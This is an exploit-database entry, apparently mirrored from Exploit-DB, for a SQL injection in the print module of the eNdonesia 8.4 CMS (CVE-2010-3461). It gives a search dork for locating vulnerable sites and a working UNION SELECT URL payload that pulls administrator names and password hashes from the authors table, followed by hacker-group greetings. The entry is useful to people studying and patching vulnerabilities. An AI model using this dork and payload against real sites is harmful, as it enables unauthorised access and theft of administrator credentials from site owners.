[] NeoSense
E X P L O I T S
title author type platform port cve id

eNdonesia 8.4 - SQL Injection

Author: vYc0d
type: webapps
platform: php
port: 
date_added: 2010-09-15 
date_updated: 2010-09-15 
verified: 1 
codes: CVE-2010-3461;OSVDB-68081 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comeNdonesia84-en.zip
======================================================================/
 eNdonesia 8.4 (Print Module) SQL Injection Vulnerability

 Download : http://sourceforge.net/projects/endonesia/files/eNdonesia
 Version  : 8.4 or lower maybe also affected
 Dork     : mod.php?mod=publisher&op=printarticle&artid=

======================================================================/

 Author  : vYc0d
 Contact : vyc0d@hackermail.com
 Site    : http://vyc0d.uni.cc
 Date    : 15-10-2010

==============================================================================================/

[Vulnerability File]

http://localhost/[eNdonesia 8.4]/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i]


[ DEMO ]

http://www.site.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--

===================================================================================================================================================/

[ Thanks to ]

[-] Allah SWT, Muhammad SAW, My Family
[-] The big Family of :
[-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew
[-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie - Persiland Security
[-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.